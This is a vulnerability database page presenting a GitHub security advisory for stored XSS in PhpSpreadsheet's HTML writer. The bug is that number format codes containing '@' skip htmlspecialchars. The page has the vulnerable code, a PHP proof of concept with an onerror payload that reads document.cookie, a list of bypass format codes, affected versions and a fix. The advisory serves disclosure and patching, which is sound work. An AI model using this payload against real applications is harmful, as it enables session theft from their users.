GHSA-HRMW-QPRP-WGMC

Vulnerability from github – Published: 2026-04-28 22:57 – Updated: 2026-05-08 19:32
VLAI?
Summary
PhpSpreadsheet has XSS via number format code with @ text placeholder bypasses htmlspecialchars in HTML writer
Details

It was discovered that there is a way to bypass HTML escaping in the HTML writer using custom number format codes.

The Problem

In Writer/Html.php around line 1592, the code checks if the formatted cell data equals the original data to decide whether to apply htmlspecialchars():

if ($cellData === $origData) {
    $cellData = htmlspecialchars($cellData, ...);
}

When a cell has a custom number format containing @ (text placeholder) with any additional literal characters, the formatter replaces @ with the cell value and adds the extra characters. This makes $cellData !== $origData, so htmlspecialchars() is skipped entirely.

Even a single trailing space in the format (@) is enough to bypass the escape.

Proof of Concept

use PhpOffice\PhpSpreadsheet\Spreadsheet;
use PhpOffice\PhpSpreadsheet\Writer\Html;
use PhpOffice\PhpSpreadsheet\Cell\DataType;

$spreadsheet = new Spreadsheet();
$sheet = $spreadsheet->getActiveSheet();

// XSS payload with malicious number format
$sheet->setCellValueExplicit('A1', '<img src=x onerror=alert(document.cookie)>', DataType::TYPE_STRING);
$sheet->getStyle('A1')->getNumberFormat()->setFormatCode('. @');

$writer = new Html($spreadsheet);
$writer->save('output.html');

The generated HTML contains:

<td>. <img src=x onerror=alert(document.cookie)></td>

The XSS payload is completely unescaped.

Tested Bypass Formats

Format Code Result Escaped?
General (default) Original value YES (safe)
. @ . + value NO (XSS!)
@ (trailing space) value + NO (XSS!)
x@ x + value NO (XSS!)

This was tested with PhpSpreadsheet 4.5.0 and confirmed the XSS executes in the browser.

Impact

Any application that: 1. Accepts uploaded XLSX files from users 2. Converts them to HTML using PhpSpreadsheet's HTML writer 3. Displays the HTML to other users

...is vulnerable to stored XSS. The attacker embeds the payload in a cell value and sets a custom number format in the XLSX file's xl/styles.xml.

Suggested Fix

Always apply htmlspecialchars() regardless of whether formatting changed the value:

// Instead of conditional escaping:
$cellData = htmlspecialchars($cellData, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

Or escape AFTER formatting, not conditionally based on equality.

Reporter

Keyvan Hardani

Severity ?
5.4 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.6.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "5.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.10.4"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.3.0"
            },
            {
              "fixed": "3.10.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.4.4"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2.0"
            },
            {
              "fixed": "2.4.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.1.15"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.1.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.30.3"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.30.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40296"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-28T22:57:13Z",
    "nvd_published_at": "2026-05-06T22:16:25Z",
    "severity": "MODERATE"
  },
  "details": "It was discovered that there is a way to bypass HTML escaping in the HTML writer using custom number format codes.\n\n## The Problem\n\nIn `Writer/Html.php` around line 1592, the code checks if the formatted cell data equals the original data to decide whether to apply `htmlspecialchars()`:\n\n```php\nif ($cellData === $origData) {\n    $cellData = htmlspecialchars($cellData, ...);\n}\n```\n\nWhen a cell has a custom number format containing `@` (text placeholder) with any additional literal characters, the formatter replaces `@` with the cell value and adds the extra characters. This makes `$cellData !== $origData`, so `htmlspecialchars()` is **skipped entirely**.\n\nEven a single trailing space in the format (`@ `) is enough to bypass the escape.\n\n## Proof of Concept\n\n```php\nuse PhpOffice\\PhpSpreadsheet\\Spreadsheet;\nuse PhpOffice\\PhpSpreadsheet\\Writer\\Html;\nuse PhpOffice\\PhpSpreadsheet\\Cell\\DataType;\n\n$spreadsheet = new Spreadsheet();\n$sheet = $spreadsheet-\u003egetActiveSheet();\n\n// XSS payload with malicious number format\n$sheet-\u003esetCellValueExplicit(\u0027A1\u0027, \u0027\u003cimg src=x onerror=alert(document.cookie)\u003e\u0027, DataType::TYPE_STRING);\n$sheet-\u003egetStyle(\u0027A1\u0027)-\u003egetNumberFormat()-\u003esetFormatCode(\u0027. @\u0027);\n\n$writer = new Html($spreadsheet);\n$writer-\u003esave(\u0027output.html\u0027);\n```\n\nThe generated HTML contains:\n```html\n\u003ctd\u003e. \u003cimg src=x onerror=alert(document.cookie)\u003e\u003c/td\u003e\n```\n\nThe XSS payload is **completely unescaped**.\n\n## Tested Bypass Formats\n\n| Format Code | Result | Escaped? |\n|---|---|---|\n| `General` (default) | Original value | YES (safe) |\n| `. @` | `. ` + value | **NO (XSS!)** |\n| `@ ` (trailing space) | value + ` ` | **NO (XSS!)** |\n| `x@` | `x` + value | **NO (XSS!)** |\n\nThis was tested with PhpSpreadsheet 4.5.0 and confirmed the XSS executes in the browser.\n\n## Impact\n\nAny application that:\n1. Accepts uploaded XLSX files from users\n2. Converts them to HTML using PhpSpreadsheet\u0027s HTML writer\n3. Displays the HTML to other users\n\n...is vulnerable to stored XSS. The attacker embeds the payload in a cell value and sets a custom number format in the XLSX file\u0027s `xl/styles.xml`.\n\n## Suggested Fix\n\nAlways apply `htmlspecialchars()` regardless of whether formatting changed the value:\n\n```php\n// Instead of conditional escaping:\n$cellData = htmlspecialchars($cellData, ENT_QUOTES | ENT_SUBSTITUTE, \u0027UTF-8\u0027);\n```\n\nOr escape AFTER formatting, not conditionally based on equality.\n\n## Reporter\nKeyvan Hardani",
  "id": "GHSA-hrmw-qprp-wgmc",
  "modified": "2026-05-08T19:32:34Z",
  "published": "2026-04-28T22:57:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-hrmw-qprp-wgmc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40296"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PhpSpreadsheet has XSS via number format code with @ text placeholder bypasses htmlspecialchars in HTML writer"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.